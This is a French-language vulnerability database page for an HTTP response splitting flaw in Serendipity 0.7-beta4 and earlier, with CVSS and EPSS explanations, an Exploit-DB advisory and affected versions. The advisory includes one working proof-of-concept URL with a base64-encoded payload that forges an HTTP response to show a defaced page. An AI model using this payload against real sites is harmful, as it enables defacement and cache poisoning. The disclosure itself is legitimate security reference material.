Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 24697
Date de publication : 2004-10-20 22h00 +00:00
Auteur : ChaoticEvil
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/11497/info
Serendipity is reported prone to an HTTP response splitting vulnerability.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.
This issue is identified in Serendipity 0.7-beta4 and prior.
http://www.example.com/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
250ZW50LUxlbmd0aDogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbnQtTGVuZ3RoOiAyMQ0KQ
29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9odG1sPg%3d%3d
Products Mentioned
Configuraton 0
S9y>>Serendipity >> Version 0.3
S9y>>Serendipity >> Version 0.4
S9y>>Serendipity >> Version 0.5
S9y>>Serendipity >> Version 0.5_pl1
S9y>>Serendipity >> Version 0.6
S9y>>Serendipity >> Version 0.6_pl1
S9y>>Serendipity >> Version 0.6_pl2
S9y>>Serendipity >> Version 0.6_pl3
S9y>>Serendipity >> Version 0.6_rc1
S9y>>Serendipity >> Version 0.6_rc2
S9y>>Serendipity >> Version 0.7_beta1
S9y>>Serendipity >> Version 0.7_beta2
S9y>>Serendipity >> Version 0.7_beta3
S9y>>Serendipity >> Version 0.7_beta4
Références